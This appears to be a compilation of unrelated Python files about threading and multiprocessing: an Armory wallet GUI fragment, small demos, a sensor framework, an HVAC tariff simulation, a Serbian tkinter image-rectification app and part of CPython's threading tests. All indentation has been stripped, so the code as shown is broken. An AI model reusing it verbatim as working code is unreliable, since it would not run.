dlgSpend.frame.prefillFromBatch(batchStr)
dlgSpend.exec_()
#############################################################################
def walletTimeoutCheck(self):
for idx,wltID in enumerate(self.walletIDList):
self.walletMap[wltID].checkWalletLockTimeout()
self.signalExecution.callLater(2, self.walletTimeoutCheck)
############################################
def checkForAlreadyOpen():
from armoryengine.ProcessMutex import PySide_ProcessMutex
LOGDEBUG('Checking for already open socket...')
prc_mutex = PySide_ProcessMutex(CLI_OPTIONS.interport, None)
urilink = ""
if CLI_ARGS:
urilink = str(CLI_ARGS[0])
if prc_mutex.test(urilink) == True:
LOGERROR('Socket already in use. Sent CLI args to existing proc.')
LOGERROR('Exiting...')
os._exit(0)
############################################
if 1:
if CLI_OPTIONS.interport > 1:
checkForAlreadyOpen()
pixLogo = QPixmap(':/splashlogo.png')
if USE_TESTNET or USE_REGTEST:
pixLogo = QPixmap(':/splashlogo_testnet.png')
SPLASH = ArmorySplashScreen(pixLogo)
SPLASH.setMask(pixLogo.mask())
SPLASH.show()
QAPP.processEvents()
# Will make this customizable
QAPP.setFont(GETFONT('var'))
TheSDM = SatoshiDaemonManager()
form = ArmoryMainWindow(splashScreen=SPLASH)
form.show()
SPLASH.finish(form)
QAPP.setQuitOnLastWindowClosed(True)
os._exit(QAPP.exec_())
|
mult-processing.py
|
import os
from multiprocessing import Process
def run_proc(name):
print('child process {name} {pid} Running'.format(name=name, pid=os.getpid()))
if __name__ == '__main__':
print('Parent process {current_pid}'.format(current_pid=os.getpid()))
for i in range(5):
p = Process(target=run_proc, args=(str(i),))
print('Process will start...')
p.start()
p.join()
print('Process end.')
|
VideoPlayer.py
|
import logging
import threading
import time
from Configuration import config
from Configuration import testMode
from features.GpioFeature import *
if not testMode:
from omxplayer import OMXPlayer
class VideoPlayer(GpioFeature):
# Path to video to play
path = config.get('VIDEO', 'PATH')
def __init__(self, parent, configSection):
super().__init__(parent, configSection)
def start(self):
logging.info("Video player start")
super().start()
if not testMode:
self.player = OMXPlayer(self.path)
self.thread = threading.Thread(target=self.checkEnd)
self.thread.start()
def stop(self):
logging.info("Video player stop")
super().stop()
if not testMode:
self.player.quit()
def checkEnd(self):
while player.is_playing:
time.sleep(1)
self.state = GenericFeature.STATE_OFF
self.indicator.swithOff()
|
base_sensors.py
|
from time import sleep
import threading
import abc
import logging
class ServerMonSensor:
def __init__(self, channels, config) -> None:
self.channels = channels
sensor_thread = threading.Thread(target=self.run_sensor)
sensor_thread.start()
def run_sensor(self) -> None:
logging.info("Instantiated {}".format(self._type()))
while True:
logging.debug("Running logic for sensor {}".format(self._type()))
self.do_sensor_logic()
if hasattr(self, "update_interval"):
sleep(self.update_interval)
def send_message(self, message) -> None:
for channel in self.channels:
channel.send_message(message, self._type())
@abc.abstractmethod
def do_sensor_logic(self):
raise NotImplementedError(
"Logic for sensor {} was not implemented".format(self._type())
)
def _type(self) -> str:
return self.__class__.__name__
class TimedSensor(ServerMonSensor):
DEFAULT_SLEEP = 60
def __init__(self, channels, config) -> None:
if "update_interval" in config.keys():
self.update_interval = int(config["update_interval"])
else:
self.update_interval = None
if self.update_interval is None:
logging.warning(
"Update interval for sensor {} checks not specified, setting to {} seconds".format(
self._type(), self.DEFAULT_SLEEP
)
)
self.update_interval = self.DEFAULT_SLEEP
super().__init__(channels, config)
|
tasks.py
|
# -*- coding:utf-8 -*-
import logging
import threading
import time
logger = logging.getLogger("tasks.project")
class PeriodicCallback(object):
def __init__(self, callback, callback_time):
self.callback = callback
if callback_time <= 0:
raise ValueError("Periodic callback must have a positive callback_time")
self.callback_time = callback_time
self._running = False
def start(self):
self._running = True
threading.Thread(target=self._schedule_next).start()
def stop(self):
"""Stops the timer."""
self._running = False
def _schedule_next(self):
while self._running:
time.sleep(self.callback_time)
self.callback()
|
HVAC2_newdata.py
|
"""
Run a large number of simulations for the HVAC model.
Results from these simulations are reported in:
C. Campaigne, M. Balandat and L. Ratliff: Welfare Effects
of Dynamic Electricity Pricing. In preparation.
@author: Maximilian Balandat
@date Sep 23, 2017
"""
# import packages and set up things
import os
import multiprocessing as mp
import pandas as pd
import logging
import logging.handlers
import logging.config
from datetime import datetime
from pyDR.simulation import get_internal_gains, log_config, simulate_HVAC, max_cool
############################################################################
# Setup
DATA_PATH = "C:/Users/Clay/Desktop/pyDR_data_pavlak/pyDR_data"
LOG_PATH = "C:/Users/Clay/Desktop/pyDR_2014-2016_logs"
RESULTS_PATH = "C:/Users/Clay/Desktop/pyDR_2014-2016_results"
# location of data files (available for download at
# https://www.ocf.berkeley.edu/~balandat/pyDR_data.zip)
data_file = os.path.join(DATA_PATH, "data_complete_2014-2016.csv")
# location of the log file
log_file = os.path.join(LOG_PATH, "HVAC_sim.log")
# directory for GUROBI log files
GRB_logdir = os.path.join(LOG_PATH, "GRB_logs")
# location of the result file
result_file = os.path.join(RESULTS_PATH, "results.csv")
# folder for output files (Attention: If not none then this will
# save a few GB of .pickle files)
output_folder = None
############################################################################
def main():
# read in data
data = pd.read_csv(data_file, parse_dates=['timestamp_GMT'],
index_col='timestamp_GMT').tz_localize('UTC')
# data = data.resample('1H').mean()
# Define model and simulation parameters
# generate copies of input data for parallelization
sim_ranges = [[datetime(2014, 1, 1), datetime(2014, 12, 31)],
[datetime(2015, 1, 1), datetime(2015, 12, 31)],
[datetime(2016, 1, 1), datetime(2016, 12, 31)]]
sim_tariffs = ['Zero', 'OptFlat', 'A1', 'A1TOU', 'A6TOU', 'A10_secondary',
'A10TOU_secondary', 'E19TOU_secondary']
sim_nodes = ['PGCC', 'PGF1', 'PGSA'] # I couldn't get all the nodes since CAISO changed its data
# retention policy
n_DR = [75]
n_ranges = len(sim_ranges)
# generate scaled sub-DataFrame
colnames = colnames = [node+'_temp' for node in sim_nodes] +\
[node+'_LMP' for node in sim_nodes]
data_sim = data[colnames]
for colname in [node+'_solar' for node in sim_nodes]:
data_sim[colname] = data[colname]/1000 # solar irradiance needs to be in kW, not Watts
data_sim['occupancy'] = get_internal_gains(data.index)
data_sim['loss_inflators'] = data['loss_inflators']
# generate a list of DataFrames of different ranges for parallelization
data_parallelize = []
for (start_date, end_date) in sim_ranges:
ts_start = pd.Timestamp(start_date, tz='US/Pacific')
ts_end = pd.Timestamp(end_date, tz='US/Pacific')
data_parallelize.append(
data_sim[(data_sim.index >= ts_start) & (data_sim.index <= ts_end)]
)
# configure logger
logging.config.dictConfig(log_config(log_file))
log_queue = mp.Queue(-1)
root = logging.getLogger()
ql = logging.handlers.QueueListener(log_queue, *root.handlers)
# start root logging via queue listener
ql.start()
root.log(logging.INFO, 'Starting simulation.')
results = []
# start simulating
with mp.Manager() as mngr:
result_queue = mngr.Queue(-1)
sim_workers = []
for i in range(n_ranges):
sim_worker = mp.Process(
target=simulate_HVAC, name='sim_worker {}'.format(i),
args=(i, log_queue, result_queue, data_parallelize[i],
sim_nodes, sim_tariffs, n_DR),
kwargs={'log_path': LOG_PATH, 'GRB_logfile': GRB_logdir + 'GRB_{}.log'.format(i),
'expMA': False, 'carbon': True, 'MIPGap': .00,
'TimeLimit': 2000, 'output_folder': output_folder,
'max_cool': max_cool})
sim_workers.append(sim_worker)
sim_worker.start()
#data wait for all worker processes to finish
for sw in sim_workers:
sw.join()
root.log(logging.DEBUG, 'Extracting results.')
# extract results
for i in range(n_ranges):
results.append(result_queue.get())
# save results
root.log(logging.DEBUG, 'Saving results to disk.')
results = pd.concat(results, ignore_index=True)
results.to_csv(result_file, index=False)
# stop logging
root.log(logging.INFO, 'Simulation completed.')
ql.stop()
if __name__ == '__main__':
main()
|
gki.py
|
#!/usr/bin/env python3
# Ukljucivanje sistemskog modula
from sys import exit as greska
# Ukljucivanje grafickog modula
from tkinter import Tk, Frame, Menu, LabelFrame, \
Canvas, Button, Entry
# Ukljucivanje pomocnog modula za
# kutijice sa iskacucim porukama
from tkinter.messagebox import showinfo, showerror, askyesno
# Ukljucivanje pomocnog modula
# za pretragu fajl sistema
from tkinter.filedialog import askopenfilename, asksaveasfilename
# Ukljucivanje modula za slike
from PIL import Image, ImageTk
# Ukljucivanje modula za matematiku
import numpy as np
import numpy.linalg as LA
from proj import naivni
# Ukljucivanje modula za kopiranje
from copy import deepcopy
# Ukljucivanje modula za niti
from threading import Thread
# Ukljucivanje modula za konveksni omotac
from omot import konveksni_omot as konv
# Nosilac programa je klasa PPGR, koja nasledjuje
# graficku klasu Tk iz modula tkinter
class PPGR(Tk):
# Konstruktor aplikacije
def __init__(self):
# Log poruka o pokretanju aplikacije
print('Dobro došli u aplikaciju PPGR!')
# Pozivanje konstruktora roditeljske klase
super().__init__()
# Postavljanje naziva aplikacije
self.title('Отклањање дисторзије')
# Onemogucavanje promene velicine prozora,
# posto je Tk prilicno plastican, pa promene
# ugrozavaju zamisljeni izgled aplikacije
self.resizable(False, False)
# Inicijalizacija glavnog menija
self.init_meni()
# Ukljucivanje prvog frejma
self.frejm = None
self.postavi_frejm(Ucitavanje)
# Postavljanje novog frejma
def postavi_frejm(self, frejm):
if self.frejm is not None:
self.frejm.destroy()
self.frejm = frejm(self)
self.frejm.pack()
# Inicijalizacija glavnog menija
def init_meni(self):
# Pravljenje glavnog menija
self.meni = Menu(self)
# Postavljanje glavnog menija i vezivanje
# komandi za odgovarajuce funkcionalnosti
self.meni.add_command(label = 'Помоћ (H)', command = self.pomoc)
self.meni.add_command(label = 'Инфо (G)', command = self.info)
self.config(menu = self.meni)
# Vezivanje tipki za akcije analogne
# onima iz prethodno postavljenog menija
self.bind('<H>', self.pomoc)
self.bind('<h>', self.pomoc)
self.bind('<G>', self.info)
self.bind('<g>', self.info)
self.bind('<Escape>', self.kraj)
# Vezivanje protokola zatvaranja prozora
# za istu akciju kao za taster Escape
self.protocol('WM_DELETE_WINDOW', self.kraj)
# Prikazivanje prozora za pomoc
def pomoc(self, dog = None):
showinfo('Помоћ',
'На почетном прозору налазе се мени и поље за одабир'
' слике. Одабиром слике са датотечног система појављује'
' се нов прозор са учитаном сликом. Левим кликом миша'
' означите четири тачке које желите да постану правоугаоник.'
' По потреби, означите још четири тачке и тиме сугеришите'
' апликацији где правоугаоник треба да се налази. У случају'
' грешке, можете поновити унос десним кликом миша. Апликацију'
' рестартујете на исти начин. Резултујућу слику можете'
' сачувати на рачунару.')
# Prikazivanje glavnih informacija o aplikaciji
def info(self, dog = None):
showinfo('Информације',
'Домаћи из Примене пројективне геометрије у рачунарству:'
' отклањање пројективне дисторзије.\n\n'
'Лазар Васовић, 99/2016\n'
'Математички факултет, 2019')
# Zatvaranje aplikacije na zahtev korisnika
def kraj(self, dog = None):
# Poruka korisniku o kraju programa
if askyesno('Kрај програма',
'Да ли стварно желите да напустите програм?'):
# Log poruka o zatvaranju aplikacije
print('PPGR zatvoren na zahtev korisnika!')
# Upotreba self.quit() zamrzava prozor na Windows-u,
# posto prekida izvrsavanje i pokretackog programa
self.destroy()
# Prvi frejm, za ucitavanje slike
class Ucitavanje(Frame):
# Konstruktor frejma
def __init__(self, koren):
# Log poruka o pokretanju frejma
print('Odaberite sliku za transformaciju.')
# Pozivanje konstruktora roditeljske klase
super().__init__(koren)
# Inicijalizacija elemenata GKI
self.init_gki()
# Inicijalizacija elemenata GKI
def init_gki(self):
# Postavljanje velicine i pozicije prozora
self.master.geometry('320x100+400+300')
# Okvir za odabir
okvir = LabelFrame(self, text = 'Одаберите слику:',
padx = 5, pady = 5)
okvir.grid(column = 0, row = 0,
padx = 15, pady = 10)
# Polje za unos slike
self.unos = Entry(okvir)
self.unos.grid(column = 1, row = 0,
padx = 10, pady = 10)
self.unos.insert(0, 'primer.bmp')
self.unos.config(state = 'readonly')
# Dugme za ucitavanje
ucitaj = Button(okvir,
text = 'Учитај',
command = self.ucitaj)
ucitaj.grid(column = 2, row = 0,
padx = 5, pady = 5)
# Dugme za pretragu
pretrazi = Button(okvir,
text = 'Претражи',
command = self.pretrazi)
pretrazi.grid(column = 3, row = 0,
padx = 5, pady = 5)
# Ucitavanje slike
def ucitaj(self, dog = None):
if not hasattr(self.master, 'fajl') \
or self.master.fajl is None:
showerror('Грешка',
'Нисте одабрали датотеку за читање.')
return
# Otvaranje odabrane slike
try:
self.master.slika = Image.open(self.master.fajl)
except:
showerror('Грешка',
'Одабрана датотека није слика.')
return
# Kopiranje originalne slike
self.master.orig = self.master.slika
self.master.dim = self.master.slika.size
# Eventualno vertikalno skracivanje
dim = self.master.slika.size
if dim[1] > 600:
self.master.slika = \
self.master.slika.resize((round(dim[0]*600/dim[1]), 600),
Image.ANTIALIAS)
# Eventualno horizotalno skracivanje
dim = self.master.slika.size
if dim[0] > 900:
self.master.slika = \
self.master.slika.resize((900, round(dim[1]*900/dim[0])),
Image.ANTIALIAS)
# Dimenzije prikaza
self.master.ndim = self.master.slika.size
# Prelazak na naredni frejm
self.master.postavi_frejm(Transformacija)
# Pretraga slika
def pretrazi(self, dog = None):
fajl = askopenfilename(
filetypes = [('Svi tipovi', '*.*')]
)
# Prikaz odabranog fajla
if fajl:
self.unos.config(state = 'normal')
self.unos.delete(0, 'end')
self.unos.insert(0, fajl[fajl.rfind('/')+1:])
self.unos.config(state = 'readonly')
self.master.fajl = fajl
# Drugi frejm, za transformaciju slike
class Transformacija(Frame):
# Konstruktor frejma
def __init__(self, koren):
# Log poruka o pokretanju frejma
print('Transformišite odabranu sliku.')
# Pozivanje konstruktora roditeljske klase
super().__init__(koren)
# Inicijalizacija odabranih tacaka
self.tacke = []
self.ntacke = []
# Inicijalizacija iscrtavanja
self.figura = None
self.id_tac = []
self.id_tex = []
self.nfigura = None
self.nid_tac = []
self.nid_tex = []
# Inicijalizacija elemenata GKI
self.init_gki()
# Inicijalizacija elemenata GKI
def init_gki(self):
# Dimenzije odabrane slike
dim = self.master.slika.size
# Postavljanje velicine i pozicije prozora
self.master.geometry(f'{max(dim[0]+5, 300)}x{dim[1]+5}+100+50')
# Postavljanje odabrane slike na prozor
self.slika = ImageTk.PhotoImage(self.master.slika)
self.platno = Canvas(self, width = dim[0]+5, height = dim[1]+5)
self.platno.create_image(dim[0]/2+2, dim[1]/2+2, image = self.slika)
self.platno.pack()
# Dodavanje transformacije u meni
self.master.meni.add_command(label = 'Трансформиши (T)',
command = self.trans)
self.master.bind('<T>', self.trans)
self.master.bind('<t>', self.trans)
# Vezivanje dogadjaja misa
self.platno.bind('<Button-1>', self.tacka)
self.platno.bind('<Button-3>', self.ponovi)
# Dodavanje tacke na platno
def tacka(self, dog):
if len(self.tacke) < 4:
self.tacke.append((dog.x-2, dog.y-2))
# Figura mora biti konveksna
konvt = konv(self.tacke)
if len(konvt) != len(self.tacke):
self.tacke.pop()
showerror('Грешка',
'Унета фигура мора бити конвексна.')
return
# Brisanje prethodno nacrtane figure
self.platno.delete(self.figura)
# Brisanje prethodno nacrtanih tacaka
[*map(self.platno.delete, self.id_tac)]
[*map(self.platno.delete, self.id_tex)]
# Crtanje konveksnog omota novih tacaka
self.id_tac = [self.platno.create_oval
(t[0], t[1], t[0]+4, t[1]+4,
outline = 'orange', fill = 'orange')
for t in self.tacke]
# Crtanje rednih brojeva tacaka
self.id_tex = [self.platno.create_text(
t[0]+12, t[1]-8,
text = str(i+1),
fill = 'blue',
font = 'Times 15')
for i, t in \
enumerate(self.tacke)]
# Crtanje nove figure
self.figura = self.platno.create_polygon([*map(
lambda x: (x[0]+2, x[1]+2), konvt)],
outline = 'yellow', fill = '') \
if len(self.tacke) > 1 else None
elif len(self.ntacke) < 4:
self.ntacke.append((dog.x-2, dog.y-2))
# Figura mora biti konveksna
konvt = konv(self.ntacke)
if len(konvt) != len(self.ntacke):
self.ntacke.pop()
showerror('Грешка',
'Унета фигура мора бити конвексна.')
return
# Brisanje prethodno nacrtane figure
self.platno.delete(self.nfigura)
# Brisanje prethodno nacrtanih tacaka
[*map(self.platno.delete, self.nid_tac)]
[*map(self.platno.delete, self.nid_tex)]
# Crtanje novih tacaka
self.nid_tac = [self.platno.create_oval
(t[0], t[1], t[0]+4, t[1]+4,
outline = 'blue', fill = 'blue')
for t in self.ntacke]
# Crtanje rednih brojeva tacaka
self.nid_tex = [self.platno.create_text(
t[0]+12, t[1]-8,
text = str(i+1),
fill = 'orange',
font = 'Times 15')
for i, t in \
enumerate(self.ntacke)]
# Crtanje nove figure
self.nfigura = self.platno.create_polygon([*map(
lambda x: (x[0]+2, x[1]+2), konvt)],
outline = 'green', fill = '') \
if len(self.ntacke) > 1 else None
# Resetovanje unosa
def ponovi(self, dog):
if self.ntacke:
self.ntacke = []
# Brisanje prethodno nacrtane figure
self.platno.delete(self.nfigura)
# Brisanje prethodno nacrtanih tacaka
[*map(self.platno.delete, self.nid_tac)]
[*map(self.platno.delete, self.nid_tex)]
elif self.tacke:
self.tacke = []
# Brisanje prethodno nacrtane figure
self.platno.delete(self.figura)
# Brisanje prethodno nacrtanih tacaka
[*map(self.platno.delete, self.id_tac)]
[*map(self.platno.delete, self.id_tex)]
# Ponovno pokretanje aplikacije
else:
self.master.fajl = None
self.master.meni.delete('Трансформиши (T)')
self.master.unbind('<T>')
self.master.unbind('<t>')
self.master.postavi_frejm(Ucitavanje)
# Naivno izracunavanje transformacije
def trans(self, dog = None):
if len(self.tacke) != 4 or 1 <= len(self.ntacke) <= 3:
showerror('Грешка',
'Нисте унели четири тачке.')
return
# Brisanje transformacije iz menija
self.platno.unbind('<Button-1>')
self.platno.unbind('<Button-3>')
self.master.meni.delete('Трансформиши (T)')
self.master.unbind('<T>')
self.master.unbind('<t>')
# Dodavanje progresa u meni
self.master.meni.add_command(label = 'Обрађено: 0%')
# Transformacija u zasebnoj niti
nit = Thread(target = self.transt)
nit.daemon = True
nit.start()
# Transformacija u zasebnoj niti
def transt(self):
try:
# Skaliranje unetih tacaka prema originalu
skala = self.master.dim[0]/self.master.ndim[0],\
self.master.dim[1]/self.master.ndim[1]
skaliraj = lambda x: (round(skala[0]*x[0]),
round(skala[1]*x[1]),
1 )
self.tacke = [*map(skaliraj, self.tacke)]
self.ntacke = [*map(skaliraj, self.ntacke)]
# Rektifikacija preslikanih tacaka
self.ntacke = self.rektifikuj(self.ntacke \
if self.ntacke else self.tacke)
# Racunanje projektivne transformacije
matrica = naivni(self.ntacke, self.tacke)
# Transformacija originalne slike
self.master.norig = self.preslikaj(matrica)
# Transformacija prikazane slike
self.master.nslika = self.master.norig.resize(self.master.ndim,
Image.ANTIALIAS)
# Prelazak na naredni frejm
self.master.poz = self.master.winfo_x(), self.master.winfo_y()
self.master.postavi_frejm(Prikaz)
except:
pass
# Rektifikacija cetiri tacke
def rektifikuj(self, tacke):
# Teziste cetvorougla
tacke = np.array(tacke)
tez = np.mean(tacke, axis = 0)
tez = [*map(round, tez)]
# Najveca rastojanja po osama
sirina, visina = 0, 0
for i in range(len(tacke)):
for j in range(i+1, len(tacke)):
# Izvlacenje iz indeksa
x = tacke[i]
y = tacke[j]
# Potencijalna nova sirina
nsir = abs(x[0]-y[0]) + 1
if nsir > sirina:
sirina = nsir
# Potencijalna nova visina
nvis = abs(x[1]-y[1]) + 1
if nvis > visina:
visina = nvis
# Pomocne promenljive
sirina = round(sirina/2)
visina = round(visina/2)
sk, sl = 0, 0
kraj = False
# Nalazenje dve tacke dijagonale
for i in range(len(tacke)):
for j in range(i+1, len(tacke)):
for k in range(len(tacke)):
if k in (i, j):
continue
for l in range(len(tacke)):
if l in (i, j, k):
continue
# Izvlacenje iz indeksa
x = tacke[i]
y = tacke[j]
xx = tacke[k]
yy = tacke[l]
# Prava kroz dve tacke
a = y[1] - x[1]
b = x[0] - y[0]
c = a*x[0] + b*x[1]
sk = np.sign(a*xx[0] + b*xx[1] - c)
sl = np.sign(a*yy[0] + b*yy[1] - c)
# Dijagonala je ako su znakovi
# druge dve tacke suprotni
if sk != sl:
kraj = True
break
if kraj:
break
if kraj:
break
if kraj:
break
# Izvlacenje iz indeksa
ii = tacke[i]
jj = tacke[j]
# i gornja leva, j donja desna
if ii[0] <= jj[0] and ii[1] <= jj[1]:
tacke[i] = self.gl(tez, sirina, visina)
tacke[j] = self.dd(tez, sirina, visina)
# k donja leva, l gornja desna
if sk < 0:
tacke[k] = self.dl(tez, sirina, visina)
tacke[l] = self.gd(tez, sirina, visina)
# l donja leva, k gornja desna
else:
tacke[l] = self.dl(tez, sirina, visina)
tacke[k] = self.gd(tez, sirina, visina)
# i donja leva, j gornja desna
elif ii[0] <= jj[0] and ii[1] > jj[1]:
tacke[i] = self.dl(tez, sirina, visina)
tacke[j] = self.gd(tez, sirina, visina)
# k donja desna, l gornja leva
if sk < 0:
tacke[k] = self.dd(tez, sirina, visina)
tacke[l] = self.gl(tez, sirina, visina)
# l donja desna, k gornja leva
else:
tacke[l] = self.dd(tez, sirina, visina)
tacke[k] = self.gl(tez, sirina, visina)
# i gornja desna, j donja leva
elif ii[0] > jj[0] and ii[1] <= jj[1]:
tacke[i] = self.gd(tez, sirina, visina)
tacke[j] = self.dl(tez, sirina, visina)
# k gornja leva, l donja desna
if sk < 0:
tacke[k] = self.gl(tez, sirina, visina)
tacke[l] = self.dd(tez, sirina, visina)
# l gornja leva, k donja desna
else:
tacke[l] = self.gl(tez, sirina, visina)
tacke[k] = self.dd(tez, sirina, visina)
# i donja desna, j gornja leva
else:
tacke[i] = self.dd(tez, sirina, visina)
tacke[j] = self.gl(tez, sirina, visina)
# k gornja desna, l donja leva
if sk < 0:
tacke[k] = self.gd(tez, sirina, visina)
tacke[l] = self.dl(tez, sirina, visina)
# l gornja desna, k donja leva
else:
tacke[l] = self.gd(tez, sirina, visina)
tacke[k] = self.dl(tez, sirina, visina)
return tacke
# Funkcije za tezisni polozaj tacke
def gl(self, tez, sirina, visina):
return tez[0]-sirina, tez[1]-visina, 1
def gd(self, tez, sirina, visina):
return tez[0]+sirina, tez[1]-visina, 1
def dl(self, tez, sirina, visina):
return tez[0]-sirina, tez[1]+visina, 1
def dd(self, tez, sirina, visina):
return tez[0]+sirina, tez[1]+visina, 1
# Primena projektivne transformacije
def preslikaj(self, matrica):
# Inverzija matrice, kako bi se svaki piksel nove
# slike odredjivao preko stare umesto obrnuto
matrica = LA.inv(matrica)
# Vadjenje matrica piksela
spix = self.master.orig.load()
norig = Image.new(self.master.orig.mode, self.master.dim)
npix = norig.load()
# Transformacija piksel po piksel; petlja
# nije najpametnije resenje, ali omogucava
# azuriranje progresa, sto je lepa stvar
n, m = self.master.dim[0], self.master.dim[1]
prog = 0
for i in range(n):
for j in range (m):
# Racunanje novih koordinata
tacka = matrica @ np.array([i, j, 1])
tacka = tacka[0]/tacka[2], tacka[1]/tacka[2]
# Azuriranje progresa u meniju
progg = round(100*(i*m+j+1)/(n*m))
if progg >= prog+1:
prog = progg
self.master.meni.entryconfig(3, label = f'Обрађено: {prog}%')
# Nema preslikavanja ako je original van slike
if tacka[0] < 0 or tacka[0] >= self.master.dim[0] \
or tacka[1] < 0 or tacka[1] >= self.master.dim[1]:
continue
# Kopiranje piksela sa originalne slike
npix[i,j] = spix[tacka]
return norig
# Treci frejm, za prikaz rezultata
class Prikaz(Frame):
# Konstruktor frejma
def __init__(self, koren):
# Log poruka o pokretanju frejma
print('Sačuvajte transformisanu sliku.')
# Pozivanje konstruktora roditeljske klase
super().__init__(koren)
# Inicijalizacija elemenata GKI
self.init_gki()
# Inicijalizacija elemenata GKI
def init_gki(self):
# Dimenzije odabrane slike
dim = self.master.ndim
# Pozicija prozora pre promene
poz = self.master.poz
# Postavljanje velicine i pozicije prozora
self.master.geometry(f'{max(dim[0]+5, 300)}x'
f'{dim[1]+5}+{poz[0]}+{poz[1]}')
# Postavljanje odabrane slike na prozor
self.slika = ImageTk.PhotoImage(self.master.nslika)
self.platno = Canvas(self, width = dim[0]+5, height = dim[1]+5)
self.platno.create_image(dim[0]/2+2, dim[1]/2+2, image = self.slika)
self.platno.pack()
# Brisanje starog dela menija
self.master.meni.delete('Обрађено: 100%')
# Vezivanje dogadjaja misa
self.platno.bind('<Button-3>', self.restart)
# Dodavanje cuvanja slike u meni
self.master.meni.add_command(label = 'Сачувај (S)',
command = self.sacuvaj)
self.master.bind('<S>', self.sacuvaj)
self.master.bind('<s>', self.sacuvaj)
# Cuvanje transformisane slike
def sacuvaj(self, dog = None):
fajl = asksaveasfilename(
filetypes = (('Bitmap sličica', '*.bmp'),
('Drugi tip', '*.*'))
)
if fajl:
try:
self.master.norig.save(fajl)
except ValueError:
self.master.norig.save(fajl + '.bmp')
# Ponovno pokretanje aplikacije
def restart(self, dog = None):
# Brisanje cuvanja iz menija
self.master.meni.delete('Сачувај (S)')
self.master.unbind('<S>')
self.master.unbind('<s>')
# Postavljanje pocetnog frejma
self.master.fajl = None
self.master.postavi_frejm(Ucitavanje)
# Obavestenje o gresci ukoliko je modul
# pokrenut kao samostalan program
if __name__ == '__main__':
greska('GKI nije samostalan program! Pokrenite main!')
|
test_threading.py
|
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
